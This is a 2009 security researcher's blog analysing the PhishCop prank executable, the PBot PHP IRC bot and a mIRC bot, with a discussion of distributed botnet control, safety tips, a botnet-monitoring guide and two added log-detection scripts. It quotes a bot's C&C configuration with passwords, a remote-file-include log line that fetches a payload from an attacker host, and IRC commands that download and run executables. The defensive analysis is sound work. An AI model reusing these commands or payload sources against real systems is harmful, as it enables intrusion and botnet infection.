Wednesday, July 22, 2009

Phishcop admits to illegal tactics.

Someone claiming to be from PhishCop responded to my blog entry about them. The comment they left solidifies my concerns about their operations. The comment and my follow up post are available here.

I am most concerned about the comment at the bottom:

I don't know what you have against Phishcop (also a completely volunteer organization) except that we seem to be effective at what we do, even if it means crossing the line a little?

My opinion about that statement is - they are admitting to, and taking ownership of, several compromised webservers. Furthermore, by damaging the forensic timeline, they could be looking at a legal battle to prove the server was compromised before they took control.

I have decided to track this group as I would any botnet. I will use my passive tools, Google searches, and phishing related emails to compile a case for law enforcement. Unlike the claims PhishCop makes, my tracking tools will NOT compromise any servers or clients. I invite you to assist by reporting all PhishCop related compromises to myself or to an agency listed at http://www.usdoj.gov/criminal/cybercrime/reporting.htm.

Google currently shows that servers on the domains fm101.fm and server.gulflook.com have been re-compromised by PhishCop. fm101.fm will be reported to my contacts in Taiwan. The other appears to be down at the moment.

A note: I know that anyone can impersonate anyone else on the internet. These compromises may not be the work of phishcop, they could be a jab against a perfectly legitimate group of individuals. I have emailed Mr. Klos for comment.

UPDATE: Thanks for the additional domains and IPs: pysy.jurnalist.biz, www.chicagowebprogrammers.com, 64.57.224.4, 12.191.45.25, networkcritical.net, and www.ifjak.org. Keep 'em coming!


Sunday, June 21, 2009

A BOZO way of advertising your website

I received a message today with a link to hxxp://201[.]3[.]192[.]61/~compras/postcard[.]jpg[.]exe.

Postcard.jpg.exe has been identified as Hoax.Phiscop.A by various anti-virus vendors, and contains the following hashes:

MD5: 7f283acb3ce6a004697c2ada3c0da539
SHA1: c8cd13b4232942ef64114e90795f8d6f7ca82aeb

Once launched, the binary performs a DNS lookup for www.phishcop.net, and attempts to get star.gif from the website.


The application then pops up an alert window insulting the user:

Or for those who prefer, the screenshot of the actual window:


PhishCop's website shows that just over 5700 visitors have visited their website. Approximately 4288 unique IPs have run their mostly harmless executable. It appears the counter started in 2005. By all standards, this would be the smallest botnet I've ever seen.



I've always been a big fan of user education - however I believe this is taking it too far. Whois reports show that the domain was registered in 2005, and it does not appear there is anything malicious with the domain or the binary. Still, this is an irresponsible way to educate users not to click links in email.

Furthermore, visiting http://201[.]3[.]192[.]61/~compras/ shows the following page:


Looking back through the Phishcop site, I noticed: Total unique IP addresses that have visited a fixed phishing site: 70465.

This suggests to me that the individual(s) behind www.phishcop.com have placed files on the remote server. A remote server that they may not control. By doing so, they have damaged forensic data, accessed and modified data that did not belong to them, and depending on the phish, could have stolen private data. After several years working as an incident investigator and even more working in the botnet scene, I find it hard to believe the owner of the site would authorize "phishcop" to make these modifications on their behalf.

Looking through my webspider history, it looks like Phishcop has been very active over the last few months. Dozens of phishing sites have redirects to Phishcop.

In the event you come across a phish or malware hosted site -- please be careful what you do with the information. You have no rights to hack a server that does not belong to you - even if it is spewing illegal or malicious data. In fact, you may damage any chance of investigation by doing so. Report phishing, malware, and other such activities to your government's CERT team, law enforcement, the victim's hosting provider or well known anti-malware/phishing teams like Shadowserver. These individuals are more likely to be trained in proper incident handling and forensic gathering procedures. Additionally, this gives the victim the best chance to fix the code that allowed the attacker in.

Please report any PhishCop modified websites as well. If you feel uncomfortable speaking with the above mentioned groups - you may report them to me. I will contact the proper authorities and victims for you.

UPDATE:

Threat Expert has something up on this as well: http://www.threatexpert.com/report.aspx?md5=7f283acb3ce6a004697c2ada3c0da539

This Google Search shows other sites with "PhishCop" pages:
http://www.google.com/search?q=%22This+has+been+a+public+service+of+http://www.phishcop.net%22+-site:www.phishcop.net&hl=en&filter=0

Note the ftp.klos.com hit is actually the guy who owns Phishcop. The FTP server also has some PHP shells/backdoors that could be used to further compromise a server.

If your site contains any of the following files, it may indicate that PhishCop was there:



Sunday, January 04, 2009

PBot, a PHP Bot found in Honeypot RFIs

While going through a couple dozen newer RFIs, I found a suspect file that turned out to be more than the usual RFI.
I thought some of my readers would like more information on this one. The file was called pbot.txt, and was downloaded from a server in Taiwan.

This file turns out to be a decently coded PHP Bot which connects to an IRC C&C. The IRC Server is located at irc.indoirc.net - which hosts a handful of smaller botnets, but also appears to be somewhat legitimate.

The bot joins a C&C channel, in this case #AnakDompu, and waits for commands. This version of the bot allows for UDP and TCP flooding, and a connect back shell. The shell is written in perl and is commonly found in many perl bots and newbie hacker kits. Google searches for dc.pl will turn up many examples.

The bot contains the dc.pl perl script as base64 encoded text. Since webservers commonly run in datacenters with a good deal of bandwidth, the TCP and UDP flooding capabilities are generally more successful than those on a home machine with limited upload speed.

A couple thousand of these bots could easily compare to 30 or 40 thousand dsl/cable user bots. Lucky for us, there are only 36 bots connected at this time.

I'm sure the bot author is still wondering why his commands aren't working on my snoopbot. He hasn't kicked/banned the fake bot, and continues to issue commands that just don't work.

Normally I have to work to strip out the C&C information out of the bots. These guys made it easier on me...

"server"=>"irc.indoirc.net",
"port"=>"6667",
"pass"=>"Walau.Jelek.Tetap.Bilang.Cakep.La",
"prefix"=>"ManieZ",
"maxrand"=>8,
"chan"=>"#AnakDompu",
"chan2"=>"#AnakDompu",
"key"=>"",
"modes"=>"+iBx",
"password"=>"AnakDompu",
"trigger"=>"~",
"hostauth"=>"Orang.Cakep.Tetap.Bilang.C-a-K-e-P.Co.Cc" // * for any hostname

Most of the standard IRC IDS Signatures will work in this case.

Note: Monitoring bots should always be done with the consent of your ISP. I have permission from my ISPs to perform these monitoring activities and to run Honeypots. As they say, don't try this at home.

For those who know what they're doing, and are authorized by their ISPs to do so, my honeypot log entry is provided below.

89.218.85.18 - - [01/Jan/2009:14:18:37 -0500] "GET --VULNERABILITY REDACTED--=http:// c-a-k-e-p.co.cc /adu /pbots.txt??? HTTP/1.1" 200 2324 - "-" "libwww-perl/5.805" "-"

Note, the 200 status code is a feature of my honeypot - it returns 200 for all pages, found or not. I added the spaces above to keep from accidental clicks.
I removed the vulnerable page information, because I don't think it's helpful to give that level of detail.
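The honeypot entry above is what an RFI probe looks like in a web log: a query-string value that is itself a remote URL, usually ending in extra "?" characters and fetched by libwww-perl. The following is an added example (not code from the original post) that scans Apache combined-format log lines for that pattern; the log lines are constructed, and the script and parameter names (index.php, page, tpl) are placeholders, since the real vulnerable page was redacted.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format: ip ident user [ts] "request" status size "referer" "user-agent".
# (The honeypot's own format has an extra field; the samples below use plain combined.)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# A query value that begins with a remote scheme is the signature of an RFI attempt:
# the attacker wants the script's include() to fetch and run code from his host.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (not the honeypot's real log). Script/parameter names are placeholders.
SAMPLE_LOG = """\
89.218.85.18 - - [01/Jan/2009:14:18:37 -0500] "GET /index.php?page=http://c-a-k-e-p.co.cc/adu/pbots.txt??? HTTP/1.1" 200 2324 "-" "libwww-perl/5.805"
192.0.2.10 - - [01/Jan/2009:14:18:40 -0500] "GET /index.php?page=about HTTP/1.1" 200 1180 "-" "Mozilla/5.0"
192.0.2.11 - - [01/Jan/2009:14:18:45 -0500] "GET /index.php?page=../../etc/passwd HTTP/1.1" 200 1180 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2009:14:19:01 -0500] "GET /view.php?id=7&tpl=HTTPS://198.51.100.7/sh.txt? HTTP/1.1" 200 2324 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the combined-log fields of one line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_findings(fields):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    query = urlsplit(fields["target"]).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not REMOTE_SCHEME_RE.match(value):
            continue
        findings.append({
            "ip": fields["ip"],
            "param": name,
            "url": value,
            # Trailing '?' turns whatever the vulnerable script appends (e.g. ".php")
            # into a harmless query string on the attacker's server.
            "null_suffix": value.endswith("?"),
            # libwww-perl is the library behind most RFI mass-scanners of this era;
            # it is a hint, not a requirement, as the fourth sample line shows.
            "scanner_ua": fields["ua"].lower().startswith("libwww-perl"),
        })
    return findings


def find_rfi_attempts(log_text):
    """Scan a whole log and return every remote-include attempt found."""
    results = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if fields:
            results.extend(rfi_findings(fields))
    return results


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

The "../../etc/passwd" line is deliberately not flagged: it is a local include attempt, a different check than the remote-URL test shown here.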

--- Another IRC bot:

A postcard? -- Nah.. A MIRC bot.



This little jewel comes from our mailbag. It was included as a binary, no source host for infection.

The file, postcard.exe is actually a RAR compressed SFX archive. When run, a RAR script that calls
a batch file is launched. The batch file opens a mountain scene picture entitled xmas.jpg.

It also runs a copy of MIRC and places that same binary in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
It uses a likely stolen/generated MIRC license ending with 6732.

It installs itself in C:\Windows\temp\spoolsv\spoolsv.exe - which would be okay, except that that directory
isn't writable on my system as a normal user. That and the location of the run key mean it will only infect
those who run with administrator rights.

MIRC Bots are scripted by those not experienced. Those that connect to public IRC servers like UnderNET prove
the author's inexperience.

This one joins the channel #romania on Undernet. I'm sure the IRCOps will be on it before too long, if they
actually have any hosts - I didn't bother to check.


Sunday, February 03, 2008

Botnet Distributed Command and Control. (DC&C)

Over the past four years we've seen a large number of law enforcement, ISPs, and hobbyists get involved with botnet monitoring. A side effect of the increased interest is that botnet operators will go to great lengths to keep their botnets hidden. That includes encryption, hiding in plain sight, use of undocumented/new protocols and distributed control structures. As law enforcement arrests more offenders, we see more of them using TOR, or their own botnets to hide their true identity. While I personally don't feel it will ever be the super-bug theory that Paul Vixie and Gadi Evron imagine, it is a concern we need to be aware of.

The following post may help drive some botnet operators deeper underground, but the concepts are not new. In many cases these concepts are in use today. I presented on these topics a year ago at the 5th Botnet Task Force conference. For a year security researchers and law enforcement have had the chance to reflect on my presentation and develop mitigation.

Distributed Command and Control is simply a term we use to identify botnets where the operator has learned that directly controlling a large botnet is a big risk to himself and his network. Large scale botnets still exist today, however the operators are wisely breaking these networks up into many smaller networks - or using peer to peer communication. Since the networks are spread out, it's harder to eliminate the threat of one attacker.

For example, if a botnet operator takes his 50,000 bots, and spreads them out into 10 networks, each net could have 5,000 drones. By spreading his network out, he mitigates some of the threat from rival operators, botnet hunters, ISPs, and law enforcement. Even if one controller node was taken offline, the botnet operator has 45,000 bots to retaliate with. In many circumstances this gives an operator the heads up he needs to update his 45,000 other bots and protect his empire.

As recently as two years ago, we started seeing botnets using a pyramid structure, like the simplified image below.



A botnet operator is represented at the top of this flow chart. He communicates with a smaller botnet of only a couple dozen drones. Those drones then communicate with many larger botnets, who perform the stated action. This provides the botnet operator a layer of protection. Now the experienced researchers or law enforcement must find the smaller net to identify the botnet operator. This is time consuming work, and without the cooperation of ISPs, it's hard work. Even if a controller node is found, it is much easier to snoop on a net with 5,000-10,000 drones than it is one with less than 100 drones.

This distributed structure also helps if the botnet operator wants to rent out or sell portions of his botnet. One chunk can be used for spam, while another may perform better in Denial of service type activities.

Another example of distributed structure is the P2P scenario, where the botnet operator issues a command, which is passed to a number of supernodes, whom then pass it to the single peers.

Mapping peer to peer and other types of DC&C's is still possible. It was done with Stormworm and will continue to be done with future P2P botnets. I won't highlight how researchers are doing this mapping, simply because we need to weigh teaching the public (including bad-guys) against keeping an ace up our sleeves. I'm hoping this post will spark many closed door conversations to help investigate other methods for tracking and identifying.

As part of the BTF presentation I gave, I wanted to outline additional C&C vectors that could be used. The idea that really caught my eye was based on hiding in plain sight: using protocols that are commonly used by millions of users every day. CME711 (Stormworm) has been easy to keep on top of, because of the mistakes they make in maintaining their DNS (fast flux), registering their domains and using UDP P2P traffic. Because of that UDP P2P traffic many large corporations have been immune - they disable UDP outbound.

The number of infected machines would increase dramatically if they used a connection model similar to Skype.

So back to hiding in plain sight - What would you say to a bot that received its commands over RSS? News readers use RSS to gather headlines and a few lines of news. Users are able to quickly choose articles that interest them, while ignoring those that do not. Millions of people subscribe to RSS feeds, and many of those feeds are of blogger or comment pages. Many news sites allow comments on their website, which can then be retrieved via RSS. Since RSS is simply http requests wrapped in a pretty new interface (XML) bots could easily parse this data to receive commands. An anonymous poster could post a command, and bots could be scheduled to pull the feed every 10-15 minutes. The request would look like legitimate RSS traffic and it would be hard to tell which visitors were bots and which were legitimate.

Using a form of encryption the botnet operator could even protect his botnet so others were unable to issue commands. High profile news and blogging sites might not be so helpful with requests to disable portions of their website because a botnet used it as a command and control vector. They might be more willing to assist law enforcement though, certainly more willing than some ISPs.
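One thing a defender can still key on in the RSS scenario above is the schedule: a bot pulling a feed "every 10-15 minutes" produces near-constant gaps between requests, while a human reader does not. The following is an added example (not from the original post) that groups a proxy log by client and feed URL and flags clients whose polling interval has almost no variance; the log rows, client addresses and feed URL are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

FEED = "http://news.example/comments.rss"  # constructed feed URL


def make_sample():
    """Constructed proxy log rows: (client_ip, timestamp, url). Not real traffic."""
    base = datetime(2008, 2, 3, 9, 0, 0)
    rows = []
    # A bot polling the comment feed every 600 s, with a few seconds of jitter.
    for i, jitter in enumerate([0, 2, -1, 3, 0, 1, -2, 2]):
        rows.append(("203.0.113.9", base + timedelta(seconds=600 * i + jitter), FEED))
    # A human reader opening the same feed at irregular times through the day.
    for mins in [0, 47, 52, 190, 415]:
        rows.append(("203.0.113.20", base + timedelta(minutes=mins), FEED))
    # A client seen too rarely to judge.
    rows.append(("203.0.113.30", base + timedelta(minutes=5), FEED))
    return rows


def periodic_pollers(rows, min_requests=5, max_cv=0.1):
    """Group requests by (client, url); flag groups whose inter-request gaps are near-constant.

    cv is the coefficient of variation (stddev / mean) of the gaps: close to 0 means
    a timer is driving the requests, not a person.
    """
    by_key = defaultdict(list)
    for client, ts, url in rows:
        by_key[(client, url)].append(ts)

    report = {}
    for key, times in by_key.items():
        if len(times) < min_requests:      # not enough samples to say anything
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        m = mean(gaps)
        cv = pstdev(gaps) / m if m > 0 else float("inf")
        report[key] = {
            "count": len(times),
            "mean_gap_s": round(m, 1),
            "cv": round(cv, 4),
            "periodic": cv <= max_cv,
        }
    return report


if __name__ == "__main__":
    for (client, url), info in periodic_pollers(make_sample()).items():
        print(client, url, info)
```

Legitimate feed readers also poll on timers, so a "periodic" hit is a triage signal to combine with other context (an unusual feed, no browser-like user agent, many hosts on the same schedule), not proof of a bot.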

So how do users protect themselves, and the rest of the internet community?

First, users should use common sense. Don't click links in email or instant messenger! If the email contains a link, use the cut and paste function to visit URLs. If you're offered a picture or video in instant messenger, verify the sender sent the file and only then use your best judgment before proceeding.

Don't download untrusted software. Even if it's recommended by your neighborhood computer genius (highschool student) - do research with an internet search engine. What do others say about it?

Don't surf as an administrator. Even if you do pick up a piece of malware, if you're logged in with limited privileges you will be less likely to install harmful malware.

Online banking should be done from a secure location. Do not access your bank account from hotspots like coffee shops or restaurants. Avoid doing so from work as well - remember in the United States you have no right to privacy on your corporate PC, which likely means your boss is watching where you surf. He or she might just be using a keystroke logger.

Never give your personal information on the internet. Your bank will not notify you of account problems via email - and in the event that changes over the next few years, bank pages are usually encrypted. Watch for "https://" at the beginning of your URL bar. Watch for the padlock icon on most browsers. If you're presented with an expired or self signed certificate, cancel the connection and notify the webmaster immediately.

Consider using a Sandboxer for programs that access the internet. SandboxIE is a great piece of software that will wrap around web browsers, email clients, instant messengers, just about any application that accesses the internet. It uses temporary user space to protect you from hostile code.

Don't consider "known" sites trusted. No site is ever trusted. Sites are compromised every day. Many times these compromises point to code that will attempt to compromise your PC.

If possible, disable Javascript for sites you casually visit. Using the NoScript Firefox plugin is an excellent idea for most users. This is becoming increasingly harder as poor coders are hired to develop websites.

Use firewalls at both the router and operating system level.

Turn your PC off when not in use. Even if your machine is infected, the damage it can do would be limited to the time you spend on your system. Most users are on their home computer for only a few hours a day.

Keep your Antivirus definitions and application patches up to date. Remember many third party applications will not update every month like your operating system. You should do this manually or work with the vendor to schedule updates.

Alternative operating systems are no excuse for poor security practices. Linux has malware, OSx has malware, BSD has malware. Keep your security hat on even if you don't run the targeted OS of the month.

Report suspected botnet activity and spam. CastleCops and Shadowserver have excellent resources available to help report malicious activity. DISOG staff always welcomes submissions via email (staff [-at-] disog.org).


Researching your own botnets

This post is mainly for people interested in researching botnets. Many people treat botnet monitoring as a hobby. In many ways, it's almost as fun as people watching.

Section 1, the rules of behavior:

You will likely see information you should not normally be privy to. For example, keylogged data, passwords, IP's of vulnerable systems, instant messenger conversations, etc. You must not repeat any private information you see. You must not use any private information you see. You may report leaks of private information to the victim (if known) or law enforcement. Do not report such information to botnet monitoring groups, mailing lists or blogs. Remember, you too could be the victim some day. Treat the data you see with respect.

You may at some point get admin rights on the botnet - Occasional hiccups happen. You must not issue any commands to disrupt the botnet or remove the drones. Issuing commands places you in the same category as the attacker, and in many countries you can be charged criminally if caught. There have been extreme cases where botnet authors replace the remove function with hostile code that causes more damage to the victim PC.

You may contact ISPs, domain registrars, and victims in attempts to get the botnet taken offline. You will likely receive the hairy eyeball - be prepared to back up your accusations/statements with hard facts.

In some countries monitoring botnets is illegal, in others there has not yet been a ruling. Check your local laws before monitoring! Understand you accept all risks. If you're not comfortable with this, don't read any further.

You will likely get attacked or threatened. As you learn how the botnets work, you will likely tip your hand. Everyone does. Since botnet hunting has become such an interesting hobby, there are hundreds of other people making these mistakes too. For that reason, the botnet operators (aka herders) have a keen eye and can identify snoopers quickly. In most cases you will simply be denied access to the botnet, by IP banning. In others you will be threatened by the botnet operator, or hit with denial of service attacks. This generally upsets your internet service provider, and you could risk losing internet access.

Never, ever, use proxies to snoop on botnets. If you're too chicken to do it from IP addresses you have legitimately rented, then don't track botnets. Using proxies means you're placing someone else at risk for denial of service attacks, and repeated attacks could mean they lose internet access. While there is a certain risk proxy operators take, your sloppy botnet monitoring skills should not be one of them. Dialup accounts are cheap, between 5 and 10 dollars a month in the US. Use one if you're worried about staying anonymous. Additionally you don't know who may be intercepting proxy traffic. A proxy operator may not be as honest as you, and may use captured botnet traffic maliciously.

Section 2, Locating binaries:

For this section I turned to my old Standby, SearchIRC. Using the keywords ".download http:// .exe" I was able to find:

.download http://www[dot]kartalkusculari[dot]com/oky.exe C:/oky.exe 1
Connects to:
Server: irc.webmaster.com
Port: 6667
Channel: #pert
Channel Topic: .advscan asn2 200 5 0 -r -b
Also downloads http://www[dot]freewebtown[dot]com/hidex/test.exe

.http.exe http://www[dot]freewebtown[dot]com/ssexs/mode.exe C:mode.exe 1
Connects to:
Server: irc.webchat.org
Port: 6667
Channel: #Scanall`

.scarikiamo http://www[dot]freewebtown[dot]com/n0mad/abdo.exe c:/abdo.exe 1
Connects to:
Server: f0ryou.no-ip.info
Port: 6667
Channel: ##!scanall, ##!scanallexp

Other malicious files can be found by looking through the archives at MalwareDomainList and OffensiveComputing.

Section 3, extracting information:

Malware disassembly is an art, and something that can't be explained in a paragraph or two. However there are a few online sandboxes that will assist you as you get started botnet hunting. Anubis and CWSandbox are great. If you have time and resources to spare, investigate creating your own Truman sandnet. Once you've decided to manually reverse engineer malware, I suggest looking around OpenRCE, and attending an Assembler class at a local college.

Other useful tools for new hunters include: Process Explorer, Malcode Analysis Pack, IdaPro, OllyDbg, Cygwin, Perl and Python.

Section 4, putting it all together:

Once you've downloaded a binary, upload it to one of the free sandbox tools listed above. These tools will give pretty detailed information. If your binary's Command and Control (C&C) method is IRC, fire up Infiltrator. Using the sandbox details you should be able to set your username, nickname, and software version to mimic the bot. Connect to the botnet and log the traffic (if permitted by local laws).

Keep a journal of what you see, learn how the bot interacts with the operator. Learn the commands commonly used, and watch for additional malware as the bots are updated or moved. Note any click-fraud or denial of service attacks.

Section 5, moving on:

Computer security doesn't start or stop with botnets and malware. There are so many more things to explore and learn. Attend conferences, join local user groups and mailing lists, obtain SANS certifications. You never know what the next big thing will be. Stay cutting edge and you will enjoy everything computer security has to offer.


Thursday, January 31, 2008

Infiltrator Botnet Monitor

Usually the first question asked by someone who is interested in botnet monitoring is, "What do you use to monitor botnets?"

New hunters tend to watch IRC networks, then move up to HTTP, P2P, etc. Many new hunters try to use off the shelf IRC clients, until they realize the bloat really isn't worth it, and monitoring more than a dozen nets is practically impossible. Furthermore, monitoring custom IRCds with an RFC compliant client will likely raise the suspicions of the botherder.

A friend (Magictao) found a newer client called Infiltrator and passed it my direction. Infiltrator is a python script written by zeroq. It should run on both Windows and *nix, and will allow you to monitor several botnets at once with very little bloat. We use something similar here at DISOG.

Paul has not had a chance to review the code yet and my python is very weak, but I could not see anything too dangerous. Just remember this client will download URLs seen in the IRC traffic. Please do what you can to protect yourself from accidental discharge of any downloaded malware. I ran the client for an hour or so this evening, and it did everything as advertised. It's missing documentation, but if you have a few minutes - give it a shot!
